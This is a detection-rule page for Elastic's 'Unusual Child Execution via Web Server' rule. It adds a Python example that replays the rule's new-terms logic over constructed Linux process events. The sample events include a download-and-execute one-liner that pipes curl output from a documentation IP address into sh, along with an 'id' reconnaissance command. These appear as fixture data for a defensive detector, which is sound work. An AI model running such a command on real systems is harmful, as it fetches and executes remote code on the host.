Unusual Child Execution via Web Server

Elastic Detection Rules

Summary
Technical summary: This rule uses the new_terms detection type to identify unusual child processes spawned by Linux web server processes. It monitors process.executable and process.command_line for children of web server parents (for example nginx, Apache, php-fpm, Ruby and Python application servers) and flags a parent/child combination that has not been observed within the preceding 7-day history window. The parent and command criteria are deliberately broad, and common benign commands are excluded to reduce noise. A hit is consistent with a web shell or other post-exploitation activity following compromise of a public-facing application, and the rule maps to MITRE ATT&CK T1505.003 Web Shell (Persistence, under T1505 Server Software Component), T1059.004 Unix Shell (Execution, under T1059 Command and Scripting Interpreter), T1071 Application Layer Protocol (Command and Control, typically over HTTP/HTTPS) and T1190 Exploit Public-Facing Application (Initial Access). The rule ships with an investigation guide covering triage steps, false-positive considerations and remediation guidance, including containment, artifact collection, credential rotation and hardening of the web service environment.
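The following is an added example, not Elastic's rule or its query: a minimal Python replay of the new-terms logic the summary describes. It seeds a baseline from historical process events, then evaluates live events from web server parents and alerts when the (parent, executable, command line) combination has not been seen within the 7-day history window, skipping a small benign exclusion list. The parent list, the exclusion list, the paths, command lines, IP address and timestamps are all constructed assumptions for the example and are not taken from the rule.

```python
"""Added example, not Elastic's rule or query: a minimal new-terms detector that
replays the logic described above over constructed Linux process events.
A term is (parent process name, child executable, child command line). A live
event from a web server parent raises an alert when its term was not seen in
the preceding 7-day history, unless the child executable is on a benign list.
All process names, paths, command lines and timestamps below are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta

HISTORY_WINDOW = timedelta(days=7)

# Constructed subset of parents treated as web servers; the rule's own list is broader.
WEB_SERVER_PARENTS = {"nginx", "apache2", "httpd", "php-fpm", "ruby", "gunicorn", "uwsgi"}

# Constructed benign exclusions (for example PHP mail() handing off to sendmail).
# These are an assumption; they are not the rule's actual exclusion list.
BENIGN_EXECUTABLES = {"/usr/sbin/sendmail", "/usr/bin/git"}


@dataclass(frozen=True)
class Event:
    """One process-start event, mirroring ECS process.parent.name,
    process.executable and process.command_line."""
    ts: datetime
    parent: str
    executable: str
    command_line: str


def term(e: Event) -> tuple[str, str, str]:
    """The field combination the new-terms baseline is keyed on."""
    return (e.parent, e.executable, e.command_line)


def detect_new_terms(history, live, window=HISTORY_WINDOW):
    """Seed the baseline from `history`, then return the live events whose
    term is new: never seen, or last seen more than `window` ago."""
    last_seen: dict[tuple[str, str, str], datetime] = {}
    for e in history:
        if e.parent in WEB_SERVER_PARENTS:
            t = term(e)
            last_seen[t] = max(e.ts, last_seen.get(t, e.ts))
    alerts = []
    for e in sorted(live, key=lambda x: x.ts):
        if e.parent not in WEB_SERVER_PARENTS:
            continue  # only children of web server processes are in scope
        if e.executable in BENIGN_EXECUTABLES:
            continue  # known-benign child, excluded to cut noise
        t = term(e)
        prev = last_seen.get(t)
        if prev is None or e.ts - prev > window:
            alerts.append(e)
        last_seen[t] = e.ts  # every sighting refreshes the baseline
    return alerts


BASE = datetime(2025, 3, 1)

# Constructed baseline: php-fpm regularly shells out to ImageMagick for thumbnails.
HISTORY_EVENTS = [
    Event(BASE + timedelta(days=d), "php-fpm", "/usr/bin/convert",
          "convert - -resize 200x200 png:-")
    for d in (1, 2, 3)
]

# Constructed live traffic: a download-and-execute one-liner, the routine
# thumbnail job, a PHP mail hand-off, recon from nginx, an interactive SSH
# session (out of scope) and the routine job returning after the baseline
# has gone stale. 203.0.113.10 is a documentation (TEST-NET-3) address.
LIVE_EVENTS = [
    Event(BASE + timedelta(days=8, hours=1), "php-fpm", "/bin/sh",
          "sh -c curl -s http://203.0.113.10/x | sh"),
    Event(BASE + timedelta(days=8, hours=2), "php-fpm", "/usr/bin/convert",
          "convert - -resize 200x200 png:-"),
    Event(BASE + timedelta(days=8, hours=3), "apache2", "/usr/sbin/sendmail",
          "sendmail -t -i"),
    Event(BASE + timedelta(days=9), "nginx", "/usr/bin/id", "id"),
    Event(BASE + timedelta(days=12), "sshd", "/bin/bash", "-bash"),
    Event(BASE + timedelta(days=20), "php-fpm", "/usr/bin/convert",
          "convert - -resize 200x200 png:-"),
]

if __name__ == "__main__":
    for a in detect_new_terms(HISTORY_EVENTS, LIVE_EVENTS):
        print(f"{a.ts:%Y-%m-%d %H:%M} {a.parent} -> {a.executable}: {a.command_line}")
```

Two behaviours worth noticing when tuning a rule like this: keying the term on the full command line means any child whose arguments vary per request (file names, request IDs) is new every time, so the benign exclusions carry most of the noise reduction; and a legitimate but infrequent job (the day-20 convert run above) re-alerts once it falls out of the 7-day window, which is expected for new_terms and should be handled in triage rather than by widening the exclusions.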
Categories
  • Endpoint
  • Web
  • Linux
Data Sources
  • Process
  • Command
ATT&CK Techniques
  • T1505
  • T1505.003
  • T1059
  • T1059.004
  • T1071
  • T1190
Created: 2026-06-01